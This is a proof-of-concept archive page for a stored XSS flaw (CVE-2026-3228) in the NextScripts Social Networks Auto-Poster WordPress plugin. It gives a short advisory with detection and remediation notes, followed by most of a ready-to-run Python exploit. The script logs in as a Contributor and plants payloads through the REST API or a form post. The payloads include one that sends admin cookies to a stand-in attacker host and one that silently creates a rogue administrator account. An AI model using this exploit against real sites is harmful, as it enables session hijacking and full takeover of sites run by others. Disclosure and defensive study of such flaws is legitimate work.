PoC Archive PoC Archive
Medium CVE-2026-3228 unpatched

NextScripts Social Networks Auto-Poster — WordPress Stored XSS (CVE-2026-3228)

by NULL200OK · 2026-07-05

CVSS 6.4/10
Severity
Medium
CVE
CVE-2026-3228
Category
web
Affected product
NextScripts: Social Networks Auto-Poster (WordPress plugin)
Affected versions
<= 4.4.6
Disclosed
2026-07-05
Patch status
unpatched

Metadata

FieldValue
Date Added2026-07-05
Last Updated2026-03
Author / ResearcherNULL200OK
CVE / AdvisoryCVE-2026-3228
Categoryweb
SeverityMedium
CVSS Score6.4 (Medium)
StatusPoC
Tagswordpress, xss, stored-xss, plugin, contributor-privilege, shortcode, session-hijacking
RelatedN/A

Affected Target

FieldValue
Software / SystemNextScripts: Social Networks Auto-Poster (WordPress plugin)
Versions Affected<= 4.4.6
Language / PlatformPython 3.6+ (requests, beautifulsoup4) targeting a PHP/WordPress site
Authentication RequiredYes (Contributor-level account or higher)
Network Access RequiredYes

Summary

The NextScripts Social Networks Auto-Poster plugin for WordPress fails to sanitize or escape the snapFB post-meta value that backs its [nxs_fbembed] shortcode. A user with Contributor-level access (or higher) can store arbitrary JavaScript in this field when creating a post; when the shortcode is rendered — including in the wp-admin post editor/preview seen by an Administrator — the injected script executes in that higher-privileged user’s browser. The included Python tool automates the whole chain: it can pre-auth scan a site for the vulnerable plugin/version, log in and verify Contributor privileges, and then inject one of several payload types (alert, cookie-stealer, admin-account creation, raw HTML, or custom JS) via the WordPress REST API (falling back to form submission with scraped nonces).


Vulnerability Details

Root Cause

Insufficient input sanitization of the snapFB post-meta value combined with insufficient output escaping when the plugin renders the [nxs_fbembed] shortcode, allowing stored HTML/JavaScript to be reflected unescaped.

Attack Vector

  1. Authenticate to the target WordPress site as a Contributor-level (or higher) user.
  2. Create a new post containing the [nxs_fbembed] shortcode, with a malicious JavaScript payload placed in the snapFB post-meta field.
  3. Publish or save the post so the payload persists in the database.
  4. Wait for (or induce) a higher-privileged user — typically an Administrator reviewing posts — to view the infected post.
  5. The unsanitized script executes in the victim’s browser session, enabling cookie theft, silent admin-account creation, or further site compromise.

Impact

An attacker with only low-privileged (Contributor) access can escalate to full site compromise by hijacking an administrator’s session or creating a rogue administrator account.


Environment / Lab Setup

Target:   WordPress site with NextScripts: Social Networks Auto-Poster <= 4.4.6 installed and activated
Attacker: Python 3.6+, pip install requests beautifulsoup4

Proof of Concept

PoC Script

See CVE-2026-3228.py in this folder.

1
python3 CVE-2026-3228.py exploit https://example.com -u contributor -p password --payload-type alert

The tool logs in as the supplied Contributor account, verifies plugin presence/version and privilege level, generates the chosen payload (alert/cookie/admin/html/custom/all), and injects it via the vulnerable shortcode’s snapFB meta field — attempting the REST API first and falling back to scraped-nonce form submission.


Detection & Indicators of Compromise

Signs of compromise:

  • Posts from Contributor-level accounts containing unexpected [nxs_fbembed] shortcodes with script-like meta values.
  • Unexplained new administrator accounts appearing shortly after a Contributor post was viewed.
  • Outbound requests from admin sessions to unfamiliar callback domains (cookie exfiltration).

Remediation

ActionDetail
Primary fixNo vendor patch confirmed as of 2026-07-05 — monitor for advisory; update NextScripts plugin when a fixed release is published
Interim mitigationRestrict Contributor-level post publishing/preview review, strip or sanitize [nxs_fbembed]/snapFB values before rendering, and disable the plugin if not in active use

References


Notes

Mirrored from https://github.com/NULL200OK/CVE-2026-3228 on 2026-07-05.

CVE-2026-3228.py
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
#!/usr/bin/env python3
"""
CVE-2026-3228.py - NextScripts WordPress Plugin Stored XSS Scanner & Exploit

"""

import argparse
import requests
import sys
import re
import base64
import urllib3
from requests.exceptions import RequestException
from bs4 import BeautifulSoup
import warnings
import time

print("""

███╗░░██╗██╗░░░██╗██╗░░░░░██╗░░░░░██████╗░░█████╗░░█████╗░  ░█████╗░██╗░░██╗
████╗░██║██║░░░██║██║░░░░░██║░░░░░╚════██╗██╔══██╗██╔══██╗  ██╔══██╗██║░██╔╝
██╔██╗██║██║░░░██║██║░░░░░██║░░░░░░░███╔═╝██║░░██║██║░░██║  ██║░░██║█████═╝░
██║╚████║██║░░░██║██║░░░░░██║░░░░░██╔══╝░░██║░░██║██║░░██║  ██║░░██║██╔═██╗░
██║░╚███║╚██████╔╝███████╗███████╗███████╗╚█████╔╝╚█████╔╝  ╚█████╔╝██║░╚██╗
╚═╝░░╚══╝░╚═════╝░╚══════╝╚══════╝╚══════╝░╚════╝░░╚════╝░  ░╚════╝░╚═╝░░╚═╝
CVE-2026-3228.py - NextScripts WordPress Plugin Stored XSS Scanner & Exploit
Vulnerability in NextScripts: Social Networks Auto-Poster <= 4.4.6 allows
authenticated attackers with Contributor-level access to inject malicious scripts
via the [nxs_fbembed] shortcode.
– NULL200OL-AI💀🔥created by NABEEL

""")

# Suppress SSL warnings for self-signed certificates
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')

# ==================== CVE Information ====================
CVE_ID = "CVE-2026-3228"
CVE_DESCRIPTION = (
    "The NextScripts: Social Networks Auto-Poster plugin for WordPress is vulnerable "
    "to Stored Cross-Site Scripting via the [nxs_fbembed] shortcode in all versions "
    "up to, and including, 4.4.6. This is due to insufficient input sanitization and "
    "output escaping on the snapFB post meta value."
)
CVE_CAUSE = (
    "The vulnerability stems from two fundamental security failures:\n"
    "  1. Insufficient input sanitization - The plugin fails to properly sanitize the\n"
    "     snapFB post meta value when processing the [nxs_fbembed] shortcode.\n"
    "  2. Insufficient output escaping - When displaying the content, the plugin fails\n"
    "     to escape the output, allowing injected scripts to execute in victims' browsers.\n"
    "This combination allows malicious JavaScript to be stored in the database and "
    "executed when any user (including administrators) views the affected page."
)
CVE_IMPACT = (
    "An attacker with Contributor-level access can:\n"
    "  - Inject arbitrary JavaScript into WordPress pages\n"
    "  - Hijack administrator sessions when they view the page\n"
    "  - Create new admin accounts\n"
    "  - Install malicious plugins\n"
    "  - Deface the website\n"
    "  - Steal sensitive information including database credentials\n"
    "The script executes in the context of the victim user, potentially leading to\n"
    "complete site compromise."
)

# ==================== Configuration ====================
TIMEOUT = 10
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# WordPress login and post endpoints
WP_LOGIN_URL = "/wp-login.php"
WP_ADMIN_URL = "/wp-admin/"
WP_POST_NEW_URL = "/wp-admin/post-new.php"
WP_POST_PHP = "/wp-admin/post.php"
WP_REST_API = "/wp-json/wp/v2/posts"

class WordPressAuthenticator:
    """Handle WordPress authentication and session management"""
    
    def __init__(self, target, username, password, timeout=TIMEOUT):
        self.target = target.rstrip('/')
        self.username = username
        self.password = password
        self.timeout = timeout
        self.session = requests.Session()
        self.session.headers.update({'User-Agent': USER_AGENT})
        self.session.verify = False
        self.logged_in = False
        self.nonce = None
        self.user_id = None
        
    def login(self):
        """Authenticate to WordPress"""
        login_url = f"{self.target}{WP_LOGIN_URL}"
        
        # First get the login page to extract any nonces
        try:
            resp = self.session.get(login_url, timeout=self.timeout)
            if resp.status_code != 200:
                print(f"[-] Failed to access login page: HTTP {resp.status_code}")
                return False
        except RequestException as e:
            print(f"[-] Error accessing login page: {e}")
            return False
        
        # Prepare login data
        login_data = {
            'log': self.username,
            'pwd': self.password,
            'wp-submit': 'Log In',
            'redirect_to': f"{self.target}{WP_ADMIN_URL}",
            'testcookie': '1'
        }
        
        # Extract redirect_to from the page if present
        soup = BeautifulSoup(resp.text, 'html.parser')
        redirect_input = soup.find('input', {'name': 'redirect_to'})
        if redirect_input and redirect_input.get('value'):
            login_data['redirect_to'] = redirect_input['value']
        
        # Submit login
        try:
            resp = self.session.post(login_url, data=login_data, timeout=self.timeout, allow_redirects=True)
            
            # Check if login was successful by looking for admin bar or dashboard
            if 'wp-admin' in resp.url or '/wp-admin/' in resp.text:
                self.logged_in = True
                print(f"[+] Successfully logged in as '{self.username}'")
                
                # Extract user info and nonce
                self._extract_user_info(resp.text)
                return True
            else:
                print("[-] Login failed - check credentials")
                return False
                
        except RequestException as e:
            print(f"[-] Error during login: {e}")
            return False
    
    def _extract_user_info(self, html):
        """Extract user ID and nonce from page HTML"""
        # Try to find user ID in admin bar
        user_pattern = r'<li[^>]*class="[^"]*user-admin-menu[^"]*"[^>]*data-user="(\d+)"'
        match = re.search(user_pattern, html)
        if match:
            self.user_id = match.group(1)
            print(f"[+] Found user ID: {self.user_id}")
        
        # Try to find a nonce (for future use)
        nonce_pattern = r'name="_wpnonce" value="([a-f0-9]+)"'
        match = re.search(nonce_pattern, html)
        if match:
            self.nonce = match.group(1)
            print(f"[+] Found WordPress nonce")
    
    def check_user_role(self):
        """Check if logged-in user has at least Contributor role"""
        if not self.logged_in:
            return False
        
        profile_url = f"{self.target}/wp-admin/profile.php"
        try:
            resp = self.session.get(profile_url, timeout=self.timeout)
            if resp.status_code == 200:
                # Look for role indicators in the page
                if 'Contributor' in resp.text or 'Administrator' in resp.text or 'Editor' in resp.text or 'Author' in resp.text:
                    # Check if user can access post editor
                    if self.can_access_editor():
                        return True
            return False
        except:
            return False
    
    def can_access_editor(self):
        """Check if user can access the post editor"""
        try:
            resp = self.session.get(f"{self.target}{WP_POST_NEW_URL}", timeout=self.timeout)
            return resp.status_code == 200 and 'post-title' in resp.text
        except:
            return False

class CVEScanner:
    """Scan for CVE-2026-3228 vulnerability"""
    
    def __init__(self, target, timeout=TIMEOUT):
        self.target = target.rstrip('/')
        self.timeout = timeout
        self.session = requests.Session()
        self.session.headers.update({'User-Agent': USER_AGENT})
        self.session.verify = False
    
    def check_wordpress(self):
        """Check if target is running WordPress"""
        try:
            # Check for WordPress identifiers
            resp = self.session.get(self.target, timeout=self.timeout)
            if resp.status_code == 200:
                if 'wp-content' in resp.text or 'wp-includes' in resp.text or 'WordPress' in resp.text:
                    return True
            return False
        except:
            return False
    
    def check_plugin_version(self):
        """Check if vulnerable plugin is installed and get version"""
        # Try to read plugin readme file
        readme_urls = [
            f"{self.target}/wp-content/plugins/social-networks-auto-poster-facebook-twitter-g/readme.txt",
            f"{self.target}/wp-content/plugins/social-networks-auto-poster/readme.txt",
            f"{self.target}/wp-content/plugins/nextscripts-social-networks-auto-poster/readme.txt"
        ]
        
        for url in readme_urls:
            try:
                resp = self.session.get(url, timeout=self.timeout)
                if resp.status_code == 200:
                    # Extract version from readme
                    version_match = re.search(r'Stable tag:\s*(\d+\.\d+\.\d+)', resp.text, re.IGNORECASE)
                    if version_match:
                        version = version_match.group(1)
                        print(f"[+] Found plugin version: {version}")
                        return version
                    
                    # Alternative pattern
                    version_match = re.search(r'Version:\s*(\d+\.\d+\.\d+)', resp.text, re.IGNORECASE)
                    if version_match:
                        version = version_match.group(1)
                        print(f"[+] Found plugin version: {version}")
                        return version
            except:
                continue
        
        # Try to find version in JavaScript files
        js_patterns = [
            f"{self.target}/wp-content/plugins/social-networks-auto-poster-facebook-twitter-g/NextScripts_SNAP.js",
            f"{self.target}/wp-content/plugins/social-networks-auto-poster-facebook-twitter-g/js/nxs.js"
        ]
        
        for url in js_patterns:
            try:
                resp = self.session.get(url, timeout=self.timeout)
                if resp.status_code == 200:
                    version_match = re.search(r'version[:\s]*["\'](\d+\.\d+\.\d+)', resp.text, re.IGNORECASE)
                    if version_match:
                        return version_match.group(1)
            except:
                continue
        
        return None
    
    def is_version_vulnerable(self, version):
        """Check if version is <= 4.4.6"""
        if not version:
            return None
        
        def parse_version(v):
            parts = re.findall(r'\d+', v)
            while len(parts) < 3:
                parts.append('0')
            return tuple(int(p) for p in parts[:3])
        
        try:
            version_tuple = parse_version(version)
            max_tuple = parse_version('4.4.6')
            return version_tuple <= max_tuple
        except:
            return False
    
    def check_vulnerability_indicators(self):
        """Look for signs that the plugin is active and vulnerable"""
        indicators = []
        
        # Check if plugin files exist
        plugin_paths = [
            "/wp-content/plugins/social-networks-auto-poster-facebook-twitter-g/",
            "/wp-content/plugins/social-networks-auto-poster/",
            "/wp-content/plugins/nextscripts-social-networks-auto-poster/"
        ]
        
        for path in plugin_paths:
            try:
                resp = self.session.get(f"{self.target}{path}", timeout=self.timeout)
                if resp.status_code == 200:
                    indicators.append(f"Plugin directory accessible: {path}")
            except:
                continue
        
        # Check for the shortcode in published posts
        try:
            resp = self.session.get(self.target, timeout=self.timeout)
            if '[nxs_fbembed' in resp.text:
                indicators.append("Plugin shortcode [nxs_fbembed] found in content")
        except:
            pass
        
        return indicators

class CVEExploiter:
    """Exploit CVE-2026-3228 by injecting malicious script"""
    
    def __init__(self, authenticator, target, timeout=TIMEOUT):
        self.auth = authenticator
        self.target = target.rstrip('/')
        self.timeout = timeout
        self.session = authenticator.session
    
    def inject_payload(self, payload, post_title=None, post_content=""):
        """
        Inject XSS payload via the vulnerable [nxs_fbembed] shortcode
        Returns (success, post_id, post_url) or (False, None, None)
        """
        if not self.auth.logged_in:
            print("[-] Not authenticated. Cannot inject payload.")
            return False, None, None
        
        # Generate a default post title if not provided
        if not post_title:
            post_title = f"CVE-2026-3228 Test Post - {time.strftime('%Y-%m-%d %H:%M:%S')}"
        
        # Construct the malicious shortcode
        # The vulnerability is triggered through the snapFB post meta
        # We need to inject the payload in a way that it gets stored and executed
        
        # Method 1: Try to use the REST API if available
        rest_url = f"{self.target}{WP_REST_API}"
        headers = {
            'Content-Type': 'application/json',
            'X-WP-Nonce': self.auth.nonce if self.auth.nonce else ''
        }
        
        # Prepare post data with malicious shortcode
        # The payload needs to be in the snapFB meta field
        post_data = {
            'title': post_title,
            'content': post_content,
            'status': 'publish',
            'meta': {
                'snapFB': payload  # The vulnerable meta field
            }
        }
        
        # Add the shortcode to content as well for demonstration
        if '[nxs_fbembed' not in post_content:
            post_data['content'] += f"\n\n[nxs_fbembed]{payload}[/nxs_fbembed]"
        
        try:
            # Try REST API first
            resp = self.session.post(rest_url, json=post_data, headers=headers, timeout=self.timeout)
            
            if resp.status_code in [200, 201]:
                data = resp.json()
                post_id = data.get('id')
                post_url = data.get('link')
                print(f"[+] Payload injected via REST API - Post ID: {post_id}")
                return True, post_id, post_url
        except:
            pass
        
        # Method 2: Fallback to traditional post creation
        print("[*] REST API failed, trying traditional post creation...")
        
        # Get the post editor page to extract nonce
        try:
            resp = self.session.get(f"{self.target}{WP_POST_NEW_URL}", timeout=self.timeout)
            if resp.status_code != 200:
                print("[-] Cannot access post editor")
                return False, None, None
            
            # Extract nonce
            nonce_pattern = r'name="_wpnonce" value="([a-f0-9]+)"'
            match = re.search(nonce_pattern, resp.text)
            wp_nonce = match.group(1) if match else ''
            
            # Extract post ID if editing
            post_id_pattern = r'post=(\d+)'
            match = re.search(post_id_pattern, resp.text)
            
            # Prepare post data
            post_action_url = f"{self.target}{WP_POST_PHP}"
            post_data = {
                '_wpnonce': wp_nonce,
                '_wp_http_referer': '/wp-admin/post-new.php',
                'user_ID': self.auth.user_id if self.auth.user_id else '1',
                'action': 'editpost',
                'originalaction': 'editpost',
                'post_author': self.auth.user_id if self.auth.user_id else '1',
                'post_type': 'post',
                'original_post_status': 'draft',
                'referredby': f"{self.target}/wp-admin/post-new.php",
                'post_title': post_title,
                'content': post_content + f"\n\n[nxs_fbembed]{payload}[/nxs_fbembed]",
                'publish': 'Publish',
                'meta': {
                    'snapFB': payload
                }
            }
            
            # Add meta as form fields
            # WordPress expects meta in a specific format
            meta_data = {
                'snapFB': payload
            }
            
            # Flatten meta for form submission
            for key, value in meta_data.items():
                post_data[f'meta[{key}]'] = value
            
            # Submit the post
            resp = self.session.post(post_action_url, data=post_data, timeout=self.timeout, allow_redirects=True)
            
            if resp.status_code == 200:
                # Try to extract the new post ID from the redirect
                post_id_match = re.search(r'post=(\d+)', resp.url)
                if post_id_match:
                    post_id = post_id_match.group(1)
                    post_url = f"{self.target}/?p={post_id}"
                    print(f"[+] Payload injected via traditional post - Post ID: {post_id}")
                    return True, post_id, post_url
                else:
                    print("[+] Payload injected, but couldn't determine post ID")
                    return True, None, None
            
            print(f"[-] Failed to create post: HTTP {resp.status_code}")
            return False, None, None
            
        except RequestException as e:
            print(f"[-] Error during exploitation: {e}")
            return False, None, None
        except Exception as e:
            print(f"[-] Unexpected error: {e}")
            return False, None, None
    
    def generate_payloads(self, payload_type='alert', custom_js=None, callback_url=None):
        """Generate various XSS payloads"""
        
        payloads = {}
        
        if payload_type == 'alert' or payload_type == 'all':
            payloads['alert'] = '<script>alert("CVE-2026-3228 - XSS Vulnerability");</script>'
        
        if payload_type == 'cookie' or payload_type == 'all':
            payloads['cookie_steal'] = '<script>fetch("' + (callback_url or 'https://attacker.com/steal') + '?cookie="+document.cookie);</script>'
        
        if payload_type == 'admin' or payload_type == 'all':
            payloads['create_admin'] = '''
            <script>
            fetch("/wp-admin/user-new.php", {
                method: "POST",
                headers: {"Content-Type": "application/x-www-form-urlencoded"},
                body: "action=createuser&user_login=attacker&email=attacker@example.com&role=administrator&_wpnonce="+document.querySelector("[name=_wpnonce]").value
            });
            </script>
            '''
        
        if payload_type == 'custom' and custom_js:
            payloads['custom'] = f'<script>{custom_js}</script>'
        
        if payload_type == 'html' or payload_type == 'all':
            payloads['html_injection'] = '<img src=x onerror=alert("XSS")>'
        
        return payloads

# ==================== Helper Functions ====================
def print_info():
    """Display detailed CVE information"""
    print(f"\n[+] {CVE_ID} - NextScripts WordPress Plugin Stored XSS")
    print("=" * 70)
    print("Description:")
    print(CVE_DESCRIPTION)
    print("\nWhy it happens:")
    print(CVE_CAUSE)
    print("\nImpact:")
    print(CVE_IMPACT)
    print("=" * 70)
    print("\nAffected Versions: All NextScripts: Social Networks Auto-Poster <= 4.4.6")
    print("Required Privileges: Contributor-level access or higher")
    print("=" * 70 + "\n")

def verify_wordpress_installation(target):
    """Quick check if target is WordPress"""
    try:
        resp = requests.get(target.rstrip('/'), timeout=TIMEOUT, verify=False)
        if 'wp-content' in resp.text or 'wp-includes' in resp.text:
            return True
        return False
    except:
        return False

# ==================== Main CLI ====================
def main():
    parser = argparse.ArgumentParser(
        description=f"{CVE_ID} - NextScripts WordPress Plugin Stored XSS Scanner & Exploit",
        epilog="Use 'info' command for detailed vulnerability information.",
        formatter_class=argparse.RawDescriptionHelpFormatter
    )
    subparsers = parser.add_subparsers(dest='command', required=True, help='Subcommands')
    
    # Info command
Showing 500 of 727 lines View full file on GitHub →